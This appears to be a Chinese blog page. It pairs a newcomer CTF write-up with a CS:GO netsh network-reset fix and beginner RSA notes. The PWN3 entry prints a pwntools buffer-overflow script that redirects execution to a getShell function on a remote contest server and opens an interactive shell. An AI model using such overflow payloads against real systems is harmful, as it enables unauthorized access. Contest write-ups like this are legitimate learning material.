2021年9月

SDUST 新生赛 by.dayi

0X01

你知道网页的初始界面是什么吗?

用bp的repeter可以做,后来发现其实直接curl就行

[root@oao ~]# curl http://124.70.85.223/web3/index.php
Woodpeckerctf{faster_as_you_can}
[root@oao ~]#curl 

0x02 签到

扫码

0x03 百度

woodpecker{Baidu_!}

0x04 福利

flag{Shen_mE_p0_t1_Mu}

0x05 贝斯祝愿你能在大学里找到对象

base64直接解码

0x06 17900 Shimakaze

使用Stegsolve.jar点几下然后扫码

0x06 邀请你的好舍友过来拍张照吧!!!!

解压后拍照

0x07 你知道凯撒大帝的密码吗?

稍微有点意思

暴力解码凯撒https://paste.ubuntu.com/p/ddQXBc8Vjd/,然后

import base64

for i in range(1,30):
    try:
        str=input()
        print(base64.b64decode(str))
    except:
        print("wa")

0X08 PWN 1

这个题,用IDAPRO可以得到源代码

pwn1

0x09开冲!

看键盘找密码

0x10

zip,然后看属性,发现:用winhex

0x11Read python code Please

解密代码如下,反过来就行


ans=[]
resarry=[153, 78, 177, 67, 178, 68, 165, 74, 167, 81, 165, 83, 168, 90, 150, 71, 167, 62, 163, 65, 163, 75, 171, 83, 187, 62, 177, 69, 161, 66, 177, 67, 167, 62, 148, 68, 163, 35, 161, 32, 176, 67, 161, 47, 180, 78, 169, 81, 163, 76, 167, 62, 171, 82, 161, 72, 175, 79, 177, 81, 163, 77, 182, 62, 115, 45, 161, 34, 150, 37, 99, 92]
for i in range(len(resarry)):
    print(resarry[71-i])
    if i%2==0:
        ans.append(resarry[i]-66 +128)
    else:
        ans.append(resarry[i]+33 +128)

for i in range(len(ans)):
    print(chr(ans[i]%128),end="")
print(ans)

0x12新佛与党

新佛曰社会主义核心价值观两个解码组合,不是他们一血那么快我都不知道我方向部队,我还研究了半天的12位进制哈哈哈哈哈

0x13 ezyiiiiiii

油猴脚本是好东西web11

然后直接F12

0x14快来救救这个可怜的二维码吧!!!!

画图解决

misc1

0x15好矮油

是个原题,我承认我百度做的,用winhex然后把01改成11就行了

0x16有手就行

啊啊啊,这个是我瞎子题,先把\n替换,base64,社工hits,考虑生活方面,然后考虑是不是qq号

然后qq名

0x17跳动的音符

好题

https://gchq.github.io/CyberChef/#recipe=XOR(%7B'option':'Hex','string':''%7D,'Standard',false/disabled)XOR_Brute_Force(1,100,0,'Standard',false,true,false,'')&input=dGxsZ3NmYGhmcXgxMzEyXHp6Z3AiIn4

打开这个网页就行

0x18 要happy啊!

社工,看wifi名,有ele.me的图,然后从支付宝找那个wifi名开头的店

0x19 [$1+$2+$3=flag](http://124.70.85.223:8000/challenges#$1+$2+$3=flag)

好烦,截图找不到了,重做

第一步,用连点器结果发现点到60还是不知道是啥,然后还是进了no_flag.php

打开F12看source,发现时间那里有个颜文字加密的js

解密吼

11}]V2U})9]

然后进入flag.php

发现字符串拼接

然后在第一步看源代码,发现第一步有注释的php得到part1

1111

然后第二部切换到.network

(第二部源代码提示过要看head)

拼手速11212

得到part2

拼接后得到flag

0x20 PWN3

根据大佬给的WP,然后直接运行

from pwn import *
context.log_level = 'DEBUG'
context.terminal = ['terminator', '-x' ,'sh' , '-c']
p = remote("43.128.1.238",10001)
elf = ELF("pwn")
#libc = ELF('')
offset = 72
address = elf.symbols['getShell']

p.recv()
payload = 'A' * offset + p64(address).decode('unicode_escape')
p.send(payload)
p.interactive()

pwn3QQ截图20210921154450

0x21Just ook my dear bro

ook解码

0x22 套娃

套娃很严重

将jpg改为zip

然后解压

然后得到2.jpg

用oursec,密码123456可以得到flag.txt

VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ==
base64得到
V2UxYzBtZV9UMF9XMDBEUEVDS2Vy
然后加密大厨可以得到
https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')&input=VjJVeFl6QnRaVjlVTUY5WE1EQkVVRVZEUzJWeQ
嗯就这样

QQ截图20210922182112

0x23安妮....我的安妮 :-} 嘿嘿嘿

呃,竟然不是word隐写,我方向错了好多次。

后来发现福尔摩斯其实可以允许.==E

于是,福尔摩斯,可以得到一串字母

这个我还找到了您的csdn博客呢!

就这样啦

感受

这次比赛,其实最大的感受就是每次打算学pwn,然后又来题,又要冲前几,特别特别累,还要做别的事情唉。不过还是很开心滴!

谢谢各位大佬出题!

如果有细节不够,欢迎叫我补充!!

csgo无法进入,黑屏闪退,尝试了各种办法,首先这是v社更新的bug,文件完整性是无缺失的,steam其他游戏可以进入,不要怀疑自己电脑的问题。

解决方法可以直接重置电脑网络配置。

用搜索框查找cmd,右键,以管理员运行

---12.11更新---
真的是,有人好蠢好蠢。复制这个↓

netsh advfirewall reset
netsh int ip reset
netsh int ipv6 reset
netsh winsock reset

---↓复制上面的,按着这个一步一步来---
1、输入netsh advfirewall reset回车

2、输入netsh int ip reset回车

3、输入netsh int ipv6 reset回车

4、输入netsh winsock reset回车

然后重启电脑。

RSA学习

1.形式

有公钥和私钥

1.单项计算容易,但逆向很难

模运算是单项函数

计算

$$ 3^3 mod 7 =6 $$

很容易

但是知道

$$ 3^xmod7=6 $$

计算x很难

2.加密

对于一个数

$$ m^e mod N =c $$

其中e为秘钥,c为密文

3.解密

$$ c^d mod N = m $$

其中d是解密的秘钥

4.变换

将两个公式合并,可以得到

$$ m^{ed} \; mod \; N =m $$

那么可以得到

$$ m^{ed}\; \equiv \; m $$

引入

欧拉函数:

$$ φ(p)=p-1 $$

其中p为质数

如果(p,q)=1,有这个性质

$$ φ(p*q)=φ(p)*φ(q) $$

不知道为啥

这里解释一下为什么可以这么推

首先有欧拉定理:

$$ m^φ(n)\equiv 1 (mod \; n) $$

可以在等式的两端同时取k次幂

$$ (m^{φ(n)})^k\equiv 1^k (mod \; n) $$

然后等式两端同时乘以m

$$ m^{kφ(n)+1} \equiv m \; (mod \; n) $$

然后模运算变形

$$ m^{kφ(n)+1} \; mod \; n = m $$

这个式子和这个类似

$$ m^{ed} \; mod \; n =m $$

可以得到

$$ ed=kφ(n)+1 $$

然后可以选取k,n,e来获得d

然后

我们可以知道

$$ d = \frac{kφ(n)+1}{e} $$

此时,如果e=3

取一个p=17,q=23,其中(17,23)=1

那么可以得到

$$ φ(17*23)=φ(391)=352 $$

e=3,k=5

$$ d=\frac{kφ(n)+1}{e}=\frac{5*352+ 1}{3}=587 $$

这样

e:公钥

d:私钥

都有啦

然后把 e:公钥n:公布

例子

当前

公钥e=3,私钥d=587,n=391

要加密的数据为97

$$ 97^3 \; mod \; 391 = 79 $$

97为加密后的密文

解密:

$$ 79^{587} \; mod = 97 $$

还原

用了587这个秘钥

嗯,暂时就这样啦

补充

e需要满足:

$$ 1<e<φ(n) $$

$$ (e,φ(n))=1 $$

还有这个性质

$$ m^{kφ(n)} \; mod \;n =1 $$

其中n为前面欧拉函数的计算结果